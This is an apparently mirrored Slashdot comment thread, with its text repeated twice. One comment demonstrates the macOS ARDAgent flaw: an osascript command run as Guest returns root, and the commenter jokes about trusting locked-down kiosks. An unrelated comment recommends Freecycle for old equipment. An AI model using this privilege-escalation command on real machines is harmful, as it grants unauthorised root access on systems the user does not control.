Confirmed that anyone logged in as Guest (supposed to be a low-privilege account) can use this exploit to get to root.
macbookpro:~ Guest$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
root
Next time your at one of those shows where they have supposedly locked-down machines for webmail etc you know how much to trust them...
I've had some success at placing older equipment on my local freecycle mailing list (wiping the disk first natch). That way, it doesn't end up in landfill (immediately) and someone who wants it has the hassle of collecting. Take a look at http://www.freecycle.org/
While you're at it, count how many unused mobile phones you have lying around...
Slashdot Mirror
Confirmed that anyone logged in as Guest (supposed to be a low-privilege account) can use this exploit to get to root.
macbookpro:~ Guest$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
root
Next time your at one of those shows where they have supposedly locked-down machines for webmail etc you know how much to trust them...
I've had some success at placing older equipment on my local freecycle mailing list (wiping the disk first natch). That way, it doesn't end up in landfill (immediately) and someone who wants it has the hassle of collecting. Take a look at http://www.freecycle.org/ While you're at it, count how many unused mobile phones you have lying around...